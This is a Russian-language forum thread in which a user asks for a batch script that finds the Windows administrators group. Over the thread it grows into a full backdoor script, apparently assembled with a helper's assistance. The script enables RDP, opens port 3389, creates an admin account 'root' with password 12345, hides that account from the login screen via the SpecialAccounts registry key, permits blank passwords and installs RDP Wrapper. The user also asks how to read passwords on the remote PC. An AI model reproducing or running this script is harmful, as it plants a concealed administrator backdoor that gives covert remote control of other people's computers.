Показать полную графическую версию : [решено] автоматически определять группу администраторов на любой системе
DetFedot
14-08-2017, 20:06
Нужно сделать код какой будет автоматически определять группа администраторов на любой системе.
Well-known security identifiers in Windows operating systems (https://support.microsoft.com/en-us/help/243330/well-known-security-identifiers-in-windows-operating-systems)
@echo off
setlocal enableextensions enabledelayedexpansion
for /f "usebackq delims=" %%i in (
`wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"`
) do set sAdminGroup%%i
if defined sAdminGroupName (
echo [%sAdminGroupName%]
)
endlocal
exit /b 0
DetFedot
14-08-2017, 20:45
А как его можно совместить с RDP
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
net user root /add
net localgroup Administrator root /add
net user root 12345
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w
…
if defined sAdminGroupName (
net.exe localgroup "%sAdminGroupName%" "root" /add
)
…
DetFedot
14-08-2017, 22:25
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
if defined sAdminGroupName ( net.exe localgroup "%sAdminGroupName%" "root" /add)
net localgroup Administrator root /add
net user root 12345
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w
Примерно должно так получится
Примерно должно так получится »
Если это утверждение — то оно неверное. Если вопрос — то на выбор два ответа: «Не должно» и «Не так».
DetFedot
14-08-2017, 22:33
А можете помочь как мне его луче поместить в код чтоб он работал
@echo off
setlocal enableextensions enabledelayedexpansion
for /f "usebackq delims=" %%i in (
`wmic.exe Group where "LocalAccount=TRUE AND SID = 'S-1-5-32-544'" get Name /value ^| find.exe /i "Name"`
) do set sAdminGroup%%i
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
net.exe user "root" "12345" /add
if defined sAdminGroupName (
net.exe localgroup "%sAdminGroupName%" "root" /add
)
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "root" /t REG_DWORD /d 0 /f
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w
endlocal
exit /b 0
DetFedot
15-08-2017, 00:44
А может тогда помочь реализовать и другой RDP код
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w
DetFedot, поясните Вашу мысль.
DetFedot
15-08-2017, 01:33
А можно сделать так чтоб сохранялся txt документ с паролем от пользователя в коде
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa" /v limitblankpassworduse /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
"RDPWInst.exe" -i -o
"RDPWInst.exe" -w
DetFedot, сожалею, но не могу понять, чего именно Вы хотите. Подождите коллег, у них легче с этим.
DetFedot
15-08-2017, 01:56
Я просто хочу понять как можно сделать так чтоб пароль можно было увидеть какой стоит на удаленом ПК
DetFedot, никак - пароль явно не хранится
© OSzone.net 2001-2012
vBulletin v3.6.4, Copyright ©2000-2025, Jelsoft Enterprises Ltd.